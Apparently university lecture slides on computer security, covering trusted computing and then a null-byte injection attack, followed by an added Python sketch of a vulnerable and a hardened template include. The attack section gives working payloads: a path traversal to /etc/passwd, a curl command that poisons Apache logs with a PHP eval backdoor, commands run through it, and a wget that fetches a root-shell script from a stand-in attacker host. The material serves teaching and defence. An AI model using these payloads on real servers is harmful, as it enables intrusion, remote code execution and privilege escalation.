UNR – CSE, Jeff Naruchitparames 3
Computer architecture
Security... privacy
Digital & physical threats
1. Identification – cryptographic
2. Attestation – digital signatures
3. Normal operating environment – from the computer's environment (remotely, too!)
Trusted platform module (TPM)
Trusted computing group (TCG)
Root of trust
Dictate accessibility (permissions) a user has
Problem: Storage
Solution: Encryption, duh!
Problem: Processing/computation of information
Solution: ???
Blind processing
Ensuring security and, in particular, privacy of information from third parties (sys admins, users, hackers, etc.)
Why so important?
ISPs
Power grid owners
Google, Amazon, other web 2.0 companies, etc
Political, economic, competition, etc
Technical details for another day...
Null-byte poisoning attacks (null-byte injection)
Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data
Bypass input sanity checking filters
NULL
= string termination or delimiter
= stop processing a string
= bytes following delimiter will be ignored
If a string loses its null character, the length of the string = unknown...
… until memory pointer finds the next null byte.
http://foo.org/index.php[?lang=bar]
/web/htdocs/foo/
Template file includes, yay!
http://foo.org/index.php?lang=../../../etc/passwd%00
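An added example, not part of the original slides: a Python model of the template include above, showing what a NUL-terminated file API ends up opening and a hardened resolver that rejects the request. The function names, the `ALLOWED` pattern and the use of `/web/htdocs/foo` as the template directory are assumptions made for illustration.

```python
import os
import re
from urllib.parse import unquote

TEMPLATE_DIR = "/web/htdocs/foo"      # assumed: templates live under the slide's docroot
ALLOWED = re.compile(r"[a-z]{2,8}")   # assumed naming scheme: short lowercase codes


def c_string_view(path: str) -> str:
    """What a NUL-terminated C API sees: everything before the first NUL."""
    return path.split("\x00", 1)[0]


def naive_include_path(raw_lang: str) -> str:
    """Decode, concatenate, append '.php': the pattern the slides describe.
    The appended extension sits after the NUL, so the file layer never sees it."""
    joined = os.path.join(TEMPLATE_DIR, unquote(raw_lang) + ".php")
    return os.path.normpath(c_string_view(joined))


def safe_include_path(raw_lang: str) -> str:
    """Return a template path inside TEMPLATE_DIR, or raise ValueError."""
    lang = unquote(raw_lang)          # decode exactly once, then validate the result
    if "\x00" in lang:
        raise ValueError("NUL byte in parameter")
    if not ALLOWED.fullmatch(lang):   # allowlist: no dots, slashes or '%' survive
        raise ValueError("parameter is not a valid language code")
    base = os.path.realpath(TEMPLATE_DIR)
    candidate = os.path.realpath(os.path.join(base, lang + ".php"))
    # Defence in depth: the canonical path must still sit under the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the template directory")
    return candidate


if __name__ == "__main__":
    # Constructed inputs modelled on the slide's URLs.
    for value in ("bar", "../../../etc/passwd%00", "bar%00", "%2500"):
        print(repr(value), "naive ->", naive_include_path(value))
        try:
            print("   safe ->", safe_include_path(value))
        except ValueError as err:
            print("   safe -> rejected:", err)
```
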
http://foo.org/index.php?lang=../../../proc/self/fd/2%00
Inject shellcode via symbolic links from /proc/self/<whatever>.
This example assumes Apache error logs are located in /proc/self/fd/2
Now what?
Note: Error logs are typically written without filtering referer variables (from browsers)
curl "http://foo.org/" -H "Host:" --referer '<?php eval($_GET[cmd]); ?>'
[Mon Feb 08 09:27:45 2010] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>
http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('pwd')
Write issues?! (permissions)
http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('find -type d -perm 0777')
Assume we find a writable directory at: /home/user/public_html/php_files_for_school/
Injection time!
http://foo.org/index.php?lang=../../../proc/self/fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/homework3.php http://haxor.website/files/amazing_shellcode_to_obtain_root_access/get_root_shell.php');
Privilege escalation